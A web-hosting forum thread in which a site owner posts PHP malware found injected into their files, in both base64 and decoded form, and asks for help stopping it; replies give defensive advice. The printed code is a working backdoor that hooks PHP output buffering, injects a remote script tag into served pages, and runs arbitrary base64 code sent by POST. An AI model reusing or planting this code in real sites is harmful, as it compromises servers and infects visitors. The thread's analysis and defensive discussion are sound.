Web Hosting, Design, & Coding forum

General discussion

Web Malware Virus Code Decoded

Hello Guys,

Today Web virus are infecting our website by :
Js file by: <script Tags>
Html files by : <script tags> , <Iframe tag etc.
and php files by : some encoded eval code, actually these are the location where virus getting execute or php encoded is virus code which reside in our own files and spread to all folders.
I have decoded the virus encoded string and reverse the code virus and found actuall virus code, but now i need some more support and help to make proper antivirus or way to stop this virus activity by apache security or any other way.

lets see..
This is virus code always present in our php files.
========
aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3RpZDEnKSl7ZnVuY3Rpb24gZ3RpZDEoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMmRoYldWbmIyZHNaUzVqYjIwdloyRnRaWGR5WldOckwybHVaR1Y0TWk1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBndGlkMTIoJGEsJGIsJGMsJGQpe2dsb2JhbCRndGlkMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGd0aWQxMSkpY2FsbF91c2VyX2Z1bmMoJGd0aWQxMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZ3RpZDEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdndGlkMScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRndGlkMWw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2d0aWQxMicpKSE9J2d0aWQxMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7
======
Now Decoded by base64 then i got virus.. Wowwww

let guys start working on this ..... help us to secure web, below code is virus

<?php
if(!function_exists('gtid1')){
function gtid1($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0]as $v)
if(count(explode("\n",$v))>5){
$e=preg_match('/#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);
}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0]as$v)
if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2dhbWVnb2dsZS5jb20vZ2FtZXdyZWNrL2luZGV4Mi5waHAgPjwvc2NyaXB0Pg=='),'',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;return$s;
}

function gtid12($a,$b,$c,$d){
global$gtid11;
$s=array();
if(function_exists($gtid11))
call_user_func($gtid11,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)
if(($a=$v['name'])=='gtid1')
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('gtid1');
for($i=0;$i<count($s);$i++){
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
$gtid1l=(($a=@set_error_handler('gtid12'))!='gtid12')?$a:0;eval(base64_decode($_POST['e']));

?>

Please start working on this to stop virus.

Discussion is locked
You are posting a reply to: Web Malware Virus Code Decoded
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: Web Malware Virus Code Decoded
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
Safeguard your own code...

In reply to: Web Malware Virus Code Decoded

When creating a website, application, etc, remember that ALL data received from outside your own environment may be malicious. That means never execute user-supplied code; immediately filter out/escape prohibited characters (for each respective language, in context) before manipulating, storing, or outputting user-supplied data (PHP-supplied functions, such as htmlentities(), are recommended); etc. Simply patching one exploit today does nothing to prevent a different exploit from being executed tomorrow; There is no substitute for good programming technique.

John

Collapse -
virus writting hardcode into files

In reply to: Safeguard your own code...

Hello John, Thanks for reply.
Yes its better way to escape strings of special charcter, but If you look into my given post virus executing our host server file and writting code into php/html/js files.
that code encoded by base64.
I have decoded and reviewed it and found that virus loaded into memory and using output buffer for storing its position.
Even i have removed all virus code from files and given 555 read and execute permission to files some time later again virus write its code into files. its wired how its writing in readonly file.
Another thing if we want to prevent execution of that function can we look for any htaccess method that can block a particular function to execute.
Like " gtid1 " and "gtid12" can stop to execute and remove from output buffer memory.

Collapse -
you are fixing wrong holes

In reply to: virus writting hardcode into files

sure, you can forbid execution of "gtid1", "gtid12" and "gtid999" funtions, but that will only save you from this particular parasite.

for better protection you should tighten filtration of all incoming data - and also check your ftp password Wink as it might have been stolen already.

Popular Forums

icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

GIVEAWAY

Enter to win* a free holiday tech gift!

CNET's giving five lucky winners the gift of their choice valued up to $250!